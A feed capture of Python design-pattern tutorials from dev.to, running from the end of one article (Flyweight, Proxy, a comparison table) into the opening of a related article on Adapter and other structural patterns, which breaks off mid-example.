<p><strong>My Take:</strong></p> <p>Flyweight is not an everyday pattern. You use it when:</p> <ol> <li>You have <strong>many objects</strong> (thousands or millions)</li> <li>Memory usage is <strong>actually a problem</strong> (not hypothetical)</li> <li>Most of the data <strong>is redundant</strong> </li> </ol> <p>Don't prematurely optimize. Start without Flyweight. When profiling shows memory as the bottleneck with repeated objects, then implement it.</p> <p>Real-world examples:</p> <ul> <li> <strong>Game engines</strong>: Particles (thousands of trees, rocks, bullets)</li> <li> <strong>Web browsers</strong>: DOM nodes (thousands of same-styled elements)</li> <li> <strong>Text editors</strong>: Character objects</li> <li> <strong>Cache systems</strong>: Pooled objects</li> </ul> <p>If you're not handling thousands of objects, Flyweight adds complexity for minimal benefit.</p> <h3> 7. Proxy Pattern </h3> <p>The Proxy pattern provides a surrogate or placeholder for another object to control access to it.</p> <p>A proxy sits between the client and the real object, intercepting all interactions.</p> <p><strong>Proxies can:</strong></p> <ul> <li> <strong>Lazy load</strong> — Create expensive objects only when needed</li> <li> <strong>Control access</strong> — Allow/deny based on permissions</li> <li> <strong>Log and monitor</strong> — Track all access</li> <li> <strong>Cache</strong> — Return cached results</li> <li> <strong>Remote access</strong> — Access objects across the network</li> </ul> <p>Think about loading an image. You don't want to load the full 10MB image until the user actually views it.</p> <p>A Proxy can delay loading until necessary.</p> <p><strong>When to use it:</strong></p> <ul> <li>Lazy initialization of expensive objects</li> <li>Access control and permissions</li> <li>Logging and monitoring</li> <li>Caching</li> <li>Remote objects (RPC, REST APIs)</li> <li>Validation before real operations</li> <li>Throttling or rate limiting</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Image loading happens immediately, even if not viewed </span><span class="k">class</span> <span class="nc">Image</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="c1"># Expensive operation </span> <span class="n">self</span><span class="p">.</span><span class="n">data</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="nf">load_from_url</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Image loaded: </span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">load_from_url</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span> <span class="c1"># Simulate expensive loading </span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Loading </span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s">... (this takes time!)</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">image_data_10mb</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">display</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Displaying </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">data</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Client code forces loading immediately </span><span class="k">def</span> <span class="nf">show_webpage</span><span class="p">():</span> <span class="n">images</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="c1"># All 100 images load immediately </span> <span class="n">image</span> <span class="o">=</span> <span class="nc">Image</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">http://example.com/image</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s">.jpg</span><span class="sh">"</span><span class="p">)</span> <span class="n">images</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">image</span><span class="p">)</span> <span class="c1"># User only views 3 images, but all 100 were loaded! </span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Displaying first 3 images:</span><span class="sh">"</span><span class="p">)</span> <span class="n">images</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="n">images</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="n">images</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="nf">show_webpage</span><span class="p">()</span> </code></pre> </div> <p>The problem: All images load eagerly, even if never viewed.</p> <h3> Good code (with Proxy) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Real image class </span><span class="k">class</span> <span class="nc">RealImage</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="n">self</span><span class="p">.</span><span class="n">data</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="nf">_load</span><span class="p">()</span> <span class="k">def</span> <span class="nf">_load</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Loading </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">url</span><span class="si">}</span><span class="s">... (expensive operation)</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">image_data_10mb</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">display</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Displaying image from </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">url</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Proxy: Controls access to RealImage </span><span class="k">class</span> <span class="nc">ImageProxy</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="n">self</span><span class="p">.</span><span class="n">_real_image</span> <span class="o">=</span> <span class="bp">None</span> <span class="c1"># Not loaded yet </span> <span class="k">def</span> <span class="nf">_ensure_loaded</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Lazy loading: Only load when actually needed</span><span class="sh">"""</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">_real_image</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">_real_image</span> <span class="o">=</span> <span class="nc">RealImage</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">url</span><span class="p">)</span> <span class="k">def</span> <span class="nf">display</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">_ensure_loaded</span><span class="p">()</span> <span class="c1"># Load only when display is called </span> <span class="n">self</span><span class="p">.</span><span class="n">_real_image</span><span class="p">.</span><span class="nf">display</span><span class="p">()</span> <span class="c1"># Client code using proxy </span><span class="k">def</span> <span class="nf">show_webpage</span><span class="p">():</span> <span class="n">images</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="c1"># Create proxies, not actual images </span> <span class="n">proxy</span> <span class="o">=</span> <span class="nc">ImageProxy</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">http://example.com/image</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s">.jpg</span><span class="sh">"</span><span class="p">)</span> <span class="n">images</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">proxy</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">100 image proxies created (nothing loaded yet)</span><span class="se">\n</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Only display 3 images - only those 3 load </span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Displaying first 3 images:</span><span class="sh">"</span><span class="p">)</span> <span class="n">images</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="c1"># This one loads </span> <span class="n">images</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="c1"># This one loads </span> <span class="n">images</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="nf">display</span><span class="p">()</span> <span class="c1"># This one loads </span> <span class="c1"># 97 images never loaded! </span> <span class="nf">show_webpage</span><span class="p">()</span> </code></pre> </div> <p><strong>Practical Example: Access Control Proxy</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Real service </span><span class="k">class</span> <span class="nc">DatabaseService</span><span class="p">:</span> <span class="k">def</span> <span class="nf">execute_query</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">query</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Executing: </span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">delete_database</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Database deleted!</span><span class="sh">"</span> <span class="c1"># Proxy with access control </span><span class="k">class</span> <span class="nc">DatabaseServiceProxy</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">service</span><span class="p">,</span> <span class="n">user_role</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">service</span> <span class="o">=</span> <span class="n">service</span> <span class="n">self</span><span class="p">.</span><span class="n">user_role</span> <span class="o">=</span> <span class="n">user_role</span> <span class="k">def</span> <span class="nf">execute_query</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">query</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">user_role</span> <span class="ow">in</span> <span class="p">[</span><span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">analyst</span><span class="sh">"</span><span class="p">]:</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">service</span><span class="p">.</span><span class="nf">execute_query</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Access denied: insufficient permissions</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">delete_database</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">user_role</span> <span class="o">==</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">service</span><span class="p">.</span><span class="nf">delete_database</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Access denied: only admins can delete</span><span class="sh">"</span> <span class="c1"># Usage </span><span class="n">db</span> <span class="o">=</span> <span class="nc">DatabaseService</span><span class="p">()</span> <span class="c1"># Admin proxy </span><span class="n">admin_proxy</span> <span class="o">=</span> <span class="nc">DatabaseServiceProxy</span><span class="p">(</span><span class="n">db</span><span class="p">,</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">admin_proxy</span><span class="p">.</span><span class="nf">execute_query</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM users</span><span class="sh">"</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">admin_proxy</span><span class="p">.</span><span class="nf">delete_database</span><span class="p">())</span> <span class="c1"># User proxy </span><span class="n">user_proxy</span> <span class="o">=</span> <span class="nc">DatabaseServiceProxy</span><span class="p">(</span><span class="n">db</span><span class="p">,</span> <span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">user_proxy</span><span class="p">.</span><span class="nf">execute_query</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM users</span><span class="sh">"</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="n">user_proxy</span><span class="p">.</span><span class="nf">delete_database</span><span class="p">())</span> <span class="c1"># Denied! </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Lazy initialization saves resources</li> <li>Control and restrict access as needed</li> <li>Add logging and monitoring transparently</li> <li>Can implement caching efficiently</li> <li>Decouple clients from real objects</li> <li>Handle remote objects transparently</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Added layer of indirection</li> <li>Slight performance overhead</li> <li>Debugging becomes harder</li> <li>Can hide implementation details excessively</li> </ul> <p><strong>My Take:</strong></p> <p>Proxy is everywhere in production systems, even if developers don't explicitly recognize it.</p> <p><strong>Common real-world uses:</strong></p> <ul> <li> <strong>ORM lazy loading</strong> (Django, SQLAlchemy)</li> <li> <strong>Web frameworks</strong> (middleware, decorators)</li> <li> <strong>Mock objects</strong> (testing)</li> <li> <strong>Caching layers</strong> (Redis, memcached)</li> <li> <strong>RPC clients</strong> (gRPC, REST clients)</li> <li><strong>Database connection pooling</strong></li> </ul> <p>The key insight: <strong>A proxy is a controlled gateway.</strong></p> <p>It's perfect for:</p> <ol> <li>Protecting expensive operations</li> <li>Controlling access</li> <li>Monitoring and logging</li> <li>Adding behavior transparentlyhttps://dev.to/mahdi0shamlou/structural-design-patterns-python-part-1</li> </ol> <p>Use Proxy when you need to intercept or control how a client interacts with an object.</p> <h2> Complete Structural Patterns Comparison </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Pattern</th> <th>Purpose</th> <th>Complexity</th> <th>When to Use</th> </tr> </thead> <tbody> <tr> <td>Adapter</td> <td>Make incompatible interfaces work together</td> <td>Low</td> <td>Integrating third-party libraries</td> </tr> <tr> <td>Bridge</td> <td>Decouple abstraction from implementation</td> <td>Medium</td> <td>Multiple independent dimensions</td> </tr> <tr> <td>Composite</td> <td>Build tree structures uniformly</td> <td>Medium</td> <td>Hierarchical data (files, menus, DOM)</td> </tr> <tr> <td>Decorator</td> <td>Add behavior without modifying classes</td> <td>Medium</td> <td>Dynamic feature addition, avoid explosion</td> </tr> <tr> <td>Facade</td> <td>Simplify complex subsystems</td> <td>Low</td> <td>Complex internal systems, APIs</td> </tr> <tr> <td>Flyweight</td> <td>Share data to save memory</td> <td>Medium</td> <td>Thousands of similar objects</td> </tr> <tr> <td>Proxy</td> <td>Control access to another object</td> <td>Medium</td> <td>Lazy loading, access control, monitoring</td> </tr> </tbody> </table></div> <h2> Structural Patterns in Real Production Code </h2> <p>You're already using these patterns whether you recognize it or not:</p> <h3> Facade in Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">requests</span> <span class="c1"># Simple facade over complex HTTP protocol </span><span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">https://api.example.com/users</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <h3> Decorator in Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/users</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@login_required</span> <span class="c1"># Decorator pattern </span><span class="nd">@cache</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="mi">300</span><span class="p">)</span> <span class="c1"># Another decorator </span><span class="k">def</span> <span class="nf">get_users</span><span class="p">():</span> <span class="k">pass</span> </code></pre> </div> <h3> Proxy in Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">user</span> <span class="o">=</span> <span class="n">User</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># Django ORM proxy </span><span class="nf">print</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">posts</span><span class="p">.</span><span class="nf">all</span><span class="p">())</span> <span class="c1"># Posts only loaded when accessed (lazy loading) </span></code></pre> </div> <h3> Adapter in Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">create_engine</span> <span class="c1"># Adapter between Python code and multiple database types </span><span class="n">engine</span> <span class="o">=</span> <span class="nf">create_engine</span><span class="p">(</span><span class="sh">"</span><span class="s">postgresql://user:pass@host/db</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <h2> Key Takeaways </h2> <ol> <li> <strong>Adapter</strong> bridges incompatible systems</li> <li> <strong>Bridge</strong> prevents class explosion from multiple dimensions</li> <li> <strong>Composite</strong> treats parts and wholes uniformly</li> <li> <strong>Decorator</strong> adds behavior without modification</li> <li> <strong>Facade</strong> hides complexity behind a simple interface</li> <li> <strong>Flyweight</strong> saves memory through sharing</li> <li> <strong>Proxy</strong> controls access and adds behavior transparently</li> </ol> <p><strong>The Golden Rule:</strong> Use structural patterns to make your code more flexible and maintainable, not to show off.</p> <p>Bad code with patterns is still bad code.</p> <h2> What's Next? </h2> <p>We've covered all <strong>Structural Design Patterns</strong>.</p> <p>Coming next in the series:</p> <ul> <li> <strong>Behavioral Design Patterns</strong> <ul> <li>Strategy, Observer, Command, State</li> <li>Template Method, Chain of Responsibility</li> <li>Mediator, Memento, Interpreter, Visitor, Iterator</li> </ul> </li> </ul> <p>Each with the same production-focused approach: real problems, real solutions, and honest guidance on when to use them.</p> <h2> Want More Deep Dives? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwxxg7sik0ncey8e4nty7.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwxxg7sik0ncey8e4nty7.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>If you enjoyed this article, check out my other production-focused guides:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">Message Brokers in 2026: Kafka, RabbitMQ, NATS</a> — Architecture decisions</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition)</a> — Security patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead</a> — Attack patterns and solutions</li> <li> <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">Durable Workflow Engines: Temporal vs dbt OS vs Transact vs Prefect</a> — System patterns</li> </ul> <p>🔗 <strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 <strong>Telegram:</strong> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 <strong>Instagram:</strong> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><strong>Author: Mahdi Shamlou | مهدی شاملو</strong></p> ai webdev programming tutorial Mahdi Shamlou | Structural Design Patterns 2026: Adapter, Bridge, Composite & Decorator — Production Examples Mahdi SHamlou | مهدی شاملو Fri, 12 Jun 2026 09:58:08 +0000 https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-adapter-bridge-composite-decorator--1f1c https://dev.to/mahdi0shamlou/mahdi-shamlou-structural-design-patterns-2026-adapter-bridge-composite-decorator--1f1c <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <p>After breaking down <a href="https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd">Creational Design Patterns</a>, you now understand how to build objects the right way.</p> <p>But building objects is only half the battle.</p> <p>The real challenge in production systems is <strong>how you organize relationships between those objects</strong>.</p> <p>That's where <strong>Structural Design Patterns</strong> come in.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu91t4nv21vfxonwuazul.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu91t4nv21vfxonwuazul.png" alt="Mahdi Shamlou" width="800" height="450"></a></p> <p>Structural patterns show you:</p> <ul> <li>How to compose objects into larger structures</li> <li>How to maintain flexibility when your system grows</li> <li>How to simplify complex relationships</li> <li>How to add behavior without touching existing code</li> </ul> <p>I've seen systems where:</p> <ul> <li>Tight coupling made changes impossible</li> <li>New features required modifying dozens of files</li> <li>Adapting to new requirements meant rewriting entire modules</li> <li>Code became harder to test and maintain</li> </ul> <p>Most of these problems vanish when you apply the right structural pattern.</p> <p>Let's dive into the patterns that actually matter in 2026.</p> <h2> What Are Structural Design Patterns? </h2> <p>Structural patterns deal with <strong>object composition and relationships</strong>.</p> <p>While Creational patterns answer: <em>"How do I create objects?"</em></p> <p>Structural patterns answer: <em>"How do I organize objects to create larger, more flexible systems?"</em></p> <p>The main structural patterns are:</p> <ol> <li> <strong>Adapter</strong> — Make incompatible objects work together</li> <li> <strong>Bridge</strong> — Decouple abstraction from implementation</li> <li> <strong>Composite</strong> — Build tree-like structures</li> <li> <strong>Decorator</strong> — Add behavior without modification</li> <li> <strong>Facade</strong> — Simplify complex subsystems</li> <li> <strong>Flyweight</strong> — Share data to save memory</li> <li> <strong>Proxy</strong> — Control access to another object</li> </ol> <p>Let's explore each one with real production code.</p> <h2> Structural Patterns That Actually Matter </h2> <h3> 1. Adapter Pattern </h3> <p>The Adapter pattern makes incompatible interfaces work together.</p> <p>Imagine you have a payment system that expects:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">processor</span><span class="p">.</span><span class="nf">charge</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">)</span> </code></pre> </div> <p>But your new payment provider expects:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">processor</span><span class="p">.</span><span class="nf">send_payment</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">card_details_object</span><span class="p">)</span> </code></pre> </div> <p>Without the Adapter pattern, you'd need to modify your entire codebase. With it, you create an adapter that translates between the two.</p> <p><strong>When to use it:</strong></p> <ul> <li>Integrating third-party libraries</li> <li>Working with legacy code</li> <li>Using multiple vendors with different APIs</li> <li>Creating unified interfaces for different providers</li> <li>Supporting multiple database drivers</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># You have two different payment systems with incompatible interfaces </span> <span class="k">class</span> <span class="nc">OldPaymentGateway</span><span class="p">:</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with card </span><span class="si">{</span><span class="n">card_number</span><span class="si">}</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">NewPaymentGateway</span><span class="p">:</span> <span class="k">def</span> <span class="nf">send_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">payment_details</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with </span><span class="si">{</span><span class="n">payment_details</span><span class="p">[</span><span class="sh">'</span><span class="s">method</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># Your application expects a unified interface </span><span class="k">def</span> <span class="nf">checkout</span><span class="p">(</span><span class="n">payment_system</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">if</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">payment_system</span><span class="p">,</span> <span class="n">OldPaymentGateway</span><span class="p">):</span> <span class="k">return</span> <span class="n">payment_system</span><span class="p">.</span><span class="nf">pay</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">)</span> <span class="k">elif</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">payment_system</span><span class="p">,</span> <span class="n">NewPaymentGateway</span><span class="p">):</span> <span class="c1"># This doesn't work! Different interface </span> <span class="k">return</span> <span class="n">payment_system</span><span class="p">.</span><span class="nf">send_payment</span><span class="p">(</span> <span class="n">amount</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">method</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">card</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">number</span><span class="sh">"</span><span class="p">:</span> <span class="n">card_number</span><span class="p">}</span> <span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Unknown payment system</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Every time you add a new provider, you modify checkout() </span></code></pre> </div> <p>The problem: Your checkout function becomes a conditional nightmare.</p> <h3> Good code (with Adapter) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Define your expected interface </span><span class="k">class</span> <span class="nc">PaymentProcessor</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">process</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Legacy system - doesn't match your interface </span><span class="k">class</span> <span class="nc">OldPaymentGateway</span><span class="p">:</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with card </span><span class="si">{</span><span class="n">card_number</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># New system - also doesn't match your interface </span><span class="k">class</span> <span class="nc">NewPaymentGateway</span><span class="p">:</span> <span class="k">def</span> <span class="nf">send_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">payment_details</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with </span><span class="si">{</span><span class="n">payment_details</span><span class="p">[</span><span class="sh">'</span><span class="s">method</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># Create adapters that translate to your expected interface </span><span class="k">class</span> <span class="nc">OldPaymentAdapter</span><span class="p">(</span><span class="n">PaymentProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">old_gateway</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">gateway</span> <span class="o">=</span> <span class="n">old_gateway</span> <span class="k">def</span> <span class="nf">process</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">gateway</span><span class="p">.</span><span class="nf">pay</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">)</span> <span class="k">class</span> <span class="nc">NewPaymentAdapter</span><span class="p">(</span><span class="n">PaymentProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">new_gateway</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">gateway</span> <span class="o">=</span> <span class="n">new_gateway</span> <span class="k">def</span> <span class="nf">process</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> 